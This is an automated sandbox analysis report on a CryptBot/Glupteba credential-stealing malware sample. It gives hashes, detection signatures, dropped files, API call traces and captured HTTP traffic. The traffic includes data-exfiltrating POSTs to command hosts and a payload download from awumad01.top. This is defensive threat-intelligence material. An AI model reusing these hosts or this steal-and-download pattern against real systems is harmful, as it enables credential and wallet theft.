Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.24453.7436

Overview

General Information

Sample Name: SecuriteInfo.com.W32.AIDetect.malware1.24453.7436 (renamed file extension from 7436 to exe)
Analysis ID: 385467
MD5: 5e3189812e802c0fd68ce592cb1e1999
SHA1: 38552111d3001f4998ab85408601873897653360
SHA256: f42553b4409992bbddc1df8b716596727762a191055cd2eebb3ced648cf5384f
Tags: CryptBot

Detection

Cryptbot Glupteba
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Cryptbot
Yara detected Glupteba
Contains functionality to register a low level keyboard hook
Delayed program exit found
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for domain / URL
Source: awumad01.top Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\Murano.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe ReversingLabs: Detection: 14%
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe ReversingLabs: Detection: 37%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Virustotal: Detection: 30%
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe ReversingLabs: Detection: 33%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00401270 GetFileAttributesW,CryptUnprotectData,LocalFree,UnmapViewOfFile,CloseHandle,FindCloseChangeNotification,CloseHandle, 0_2_00401270
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040410E CryptUnprotectData,CryptUnprotectData, 0_2_0040410E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040426D CryptUnprotectData,CryptUnprotectData, 0_2_0040426D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00401470 CryptUnprotectData,LocalFree, 0_2_00401470
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00404400 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CryptUnprotectData,CryptUnprotectData, 0_2_00404400
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040365A ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CryptUnprotectData, 0_2_0040365A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00403600 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CryptUnprotectData, 0_2_00403600

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Unpacked PE file: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Unpacked PE file: 16.2.4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 25.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Unpacked PE file: 33.2.SmartClock.exe.400000.0.unpack
Uses 32bit PE files
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040F1D0 FindFirstFileW,FindNextFileW,FindClose, 0_2_0040F1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00414650 ExpandEnvironmentStringsW,FindFirstFileW,FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW, 0_2_00414650
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0041469B FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 0_2_0041469B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00416AC0 FindFirstFileW,FindFirstFileW, 0_2_00416AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00416C3A CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 0_2_00416C3A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040F259 FindFirstFileW,FindNextFileW,FindClose, 0_2_0040F259
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406301 FindFirstFileW,FindClose, 13_2_00406301
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 13_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0040F64C FindFirstFileExW, 16_2_0040F64C
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F5F89C FindFirstFileExW, 16_2_03F5F89C
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00403117 FindFirstFileW,FindClose,SetLastError,CompareFileTime, 18_2_00403117
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00408FA7 ??2@YAPAXI@Z,FindFirstFileW,FindClose, 18_2_00408FA7
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00402A0B FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 18_2_00402A0B
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00402B28 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW, 18_2_00402B28
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0040F64C FindFirstFileExW, 22_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A0F89C FindFirstFileExW, 22_2_05A0F89C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0040F64C FindFirstFileExW, 25_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059DF89C FindFirstFileExW, 25_2_059DF89C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File opened: C:\Users\user\AppData\Local

Networking:

Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Mon, 12 Apr 2021 13:12:19 GMT Server: Apache/2.2.22 (@RELEASE@) Last-Modified: Mon, 12 Apr 2021 02:46:58 GMT ETag: "320648-132ebb-5bfbd8703eb96" Accept-Ranges: bytes Content-Length: 1257147 Connection: close Content-Type: application/octet-stream
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------jmACsrpgBVBRjTx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Host: aufsvg12.top Content-Length: 67238 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------pwDccphxPeFIadj User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Host: mardeq01.top Content-Length: 67223 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: awumad01.top Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: awumad01.top Connection: Keep-Alive
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040C561 Sleep,Sleep,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,ExitProcess,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,ShellExecuteW,ExitProcess, 0_2_0040C561
Source: global traffic HTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: awumad01.top Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: awumad01.top Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: aufsvg12.top
Source: unknown HTTP traffic detected: POST /index.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------jmACsrpgBVBRjTx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Host: aufsvg12.top Content-Length: 67238 Cache-Control: no-cache
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmp String found in binary or memory: http://aufsvg12.top/index.php
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmp String found in binary or memory: http://aufsvg12.top/index.php)
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmp String found in binary or memory: http://aufsvg12.top/index.phpz
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383529704.0000000004207000.00000004.00000001.sdmp String found in binary or memory: http://awumad01.top/downfiles/lv.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmp String found in binary or memory: http://awumad01.top/downfiles/lv.exeaC:
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377076214.0000000005C65000.00000004.00000001.sdmp String found in binary or memory: http://awumad01.top/download.php?file=lv.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp String found in binary or memory: http://awumad01.top/download.php?file=lv.exeopenBOOLEANBIT
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377076214.0000000005C65000.00000004.00000001.sdmp String found in binary or memory: http://awumad01.top/download.php?file=lv.exeqEaRrk
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmp String found in binary or memory: http://awumad01.top/download.php?file=lv.exeskQ
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383529704.0000000004207000.00000004.00000001.sdmp String found in binary or memory: http://mardeq01.top/index.php
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377165659.0000000005CD9000.00000004.00000001.sdmp, Murano.exe, 0000000D.00000000.381399655.0000000000409000.00000002.00020000.sdmp, Murano.exe.0.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://www.avast.com0
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://www.avast.com0/
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377605522.0000000005CD2000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: Notti.eps.18.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_004082E1 SetWindowsHookExW 00000002,Function_000082B3,00000000,00000000 18_2_004082E1
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 13_2_004050F9
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_00409086 GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock, 16_2_00409086
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00414000 Sleep,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,GdiplusShutdown,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdiplusShutdown, 0_2_00414000
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 13_2_004044D1
Creates a DirectInput object (often for capturing keystrokes)
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383438295.000000000416A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F59AC0 NtdllDefWindowProc_W, 16_2_03F59AC0
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F59946 SetLastError,SetWindowLongW,GetLastError,GetWindowLongW,NtdllDefWindowProc_W, 16_2_03F59946
